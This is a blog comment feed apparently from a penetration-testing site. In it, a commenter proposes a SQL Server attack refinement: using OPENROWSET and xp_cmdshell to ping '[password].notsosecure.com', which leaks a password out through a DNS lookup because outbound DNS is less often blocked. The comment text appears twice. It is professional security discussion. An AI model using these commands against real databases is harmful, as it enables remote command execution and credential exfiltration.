Comments on: Ten Cents http://www.notsosecure.com/folder2/2007/04/14/ten-cents/ From Pentesters To Pentesters Sat, 11 Oct 2008 22:29:58 +0000 http://wordpress.org/?v=2.6.2 By: pentestmonkey http://www.notsosecure.com/folder2/2007/04/14/ten-cents/#comment-53 pentestmonkey Sat, 14 Apr 2007 12:15:30 +0000 http://www.notsosecure.com/folder2/2007/04/14/ten-cents/#comment-53 Quoting: <blockquote> select null from openrowset(’sqloledb’,”;’sa’;'[password]’,'exec master..xp_cmshell ”ping my_host”’). I will confirm this sometime later. </blockquote> I thought of a possible refinement to your idea. Maybe you could get the query to send a DNS request containing the password. Instead of: exec master..xp_cmshell "ping myhost" Do: exec master..xp_cmshell "ping [password].notsosecure.com" Listen for the DNS request on your nameserver. Outbound ping might be blocked, but outbound DNS is less likely to be blocked. Ref: http://pentestmonkey.net/blog/mssql-dns/ Just a thought. Quoting:

select null from openrowset(’sqloledb’,”;’sa’;’[password]’,’exec
master..xp_cmshell ”ping my_host”’). I will confirm this sometime later.

I thought of a possible refinement to your idea. Maybe you could get
the query to send a DNS request containing the password.

Instead of:

exec master..xp_cmshell “ping myhost”

Do:

exec master..xp_cmshell “ping [password].notsosecure.com”

Listen for the DNS request on your nameserver. Outbound ping might be
blocked, but outbound DNS is less likely to be blocked.

Ref: http://pentestmonkey.net/blog/mssql-dns/

Just a thought.

]]>